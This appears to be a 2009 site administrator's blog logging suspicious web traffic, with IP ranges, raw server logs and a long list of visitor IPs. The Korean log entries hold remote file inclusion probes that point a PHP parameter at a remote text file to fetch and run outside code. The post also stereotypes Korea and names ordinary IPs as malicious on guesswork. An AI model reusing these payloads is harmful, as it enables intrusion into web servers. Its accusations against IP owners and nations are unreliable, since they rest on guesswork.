Monday, October 19, 2009

Bad Traffic - Monitoring our sites

Traffic from these two networks have been monitoring one of our site, possibly scraping content.

Rackspace.com, Ltd. RSCP-NET-4 (NET-174-143-0-0-1)
174.143.0.0 - 174.143.255.255
Slicehost RSPC-1251808572434376 (NET-174-143-180-0-1)
174.143.180.0 - 174.143.183.255

Object Software Development SEANET-CBLK (NET-199-181-164-0-1)
199.181.164.0 - 199.181.168.255
Seanet Corporation SEANET01-NET01 (NET-199-181-165-0-1)
199.181.165.0 - 199.181.167.255

Monday, October 12, 2009

Bad Traffic from Korea

Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server but somehow this showed up in our logs and generating errors:

222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-"
"Mozilla/5.0" -

This is coming from a common spamming/hacking part of the world - Korea:

inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR

Saturday, October 10, 2009

Strange Traffic in Logs - a bunch from Canada

There is something bizarre going on in our logs. It is interesting that the first of such links comes from aQuantive - now Microsoft advertising.

We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.

For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).

Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.

One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.

The traffic started on September 1st 2009. Here are the IP addresses involved:

10/9/2009 8:30:38 PM 70.83.96.135
10/9/2009 8:27:18 PM 70.83.96.135
10/9/2009 4:52:29 PM 99.240.97.84
10/9/2009 12:54:38 PM 99.248.203.79
10/9/2009 9:07:30 AM 24.186.175.130
10/9/2009 9:06:41 AM 24.186.175.130
10/9/2009 9:06:22 AM 24.186.175.130
10/9/2009 9:05:35 AM 24.186.175.130
10/9/2009 9:04:51 AM 24.186.175.130
10/9/2009 9:04:06 AM 216.239.45.19
10/9/2009 9:03:34 AM 216.239.45.19
10/9/2009 9:02:25 AM 216.239.45.19
10/8/2009 11:52:36 PM 98.111.75.233
10/8/2009 11:41:25 AM 99.230.181.71
10/8/2009 11:41:03 AM 99.230.181.71
10/8/2009 11:16:19 AM 65.254.6.82
10/8/2009 11:10:52 AM 68.178.43.83
10/8/2009 11:05:59 AM 24.177.28.130
10/8/2009 10:23:32 AM 70.79.189.119
10/8/2009 10:23:26 AM 70.79.189.119
10/8/2009 10:18:40 AM 98.243.28.190
10/8/2009 9:24:55 AM 71.126.247.202
10/8/2009 7:37:24 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/7/2009 10:25:02 PM 76.174.128.45
10/7/2009 9:48:20 PM 98.247.76.189
10/7/2009 9:46:38 PM 98.247.76.189
10/7/2009 9:38:59 PM 98.247.76.189
10/6/2009 12:02:20 PM 64.62.114.34
10/5/2009 9:13:58 PM 98.247.76.189
10/5/2009 9:13:18 PM 98.247.76.189
10/5/2009 9:12:00 PM 98.247.76.189
10/5/2009 4:29:15 PM 64.105.65.4
10/5/2009 8:09:05 AM 24.18.190.143
10/2/2009 5:58:09 PM 98.247.76.189
10/2/2009 5:09:25 PM 98.247.76.189
10/2/2009 4:12:45 PM 98.247.76.189
10/2/2009 3:57:34 PM 98.247.76.189
10/2/2009 3:46:32 PM 98.247.76.189
10/2/2009 7:48:34 AM 64.105.65.105
9/29/2009 4:47:54 PM 67.171.17.196
9/28/2009 4:49:28 PM 70.102.156.98
9/24/2009 1:25:39 PM 72.86.22.146
9/24/2009 1:01:32 PM 72.86.22.146
9/21/2009 3:58:43 PM 76.22.80.65
9/10/2009 2:14:01 PM 76.28.231.49
9/2/2009 4:24:01 PM 71.39.140.20
9/1/2009 3:09:50 PM 216.99.5.100
9/1/2009 3:09:23 PM 216.99.5.100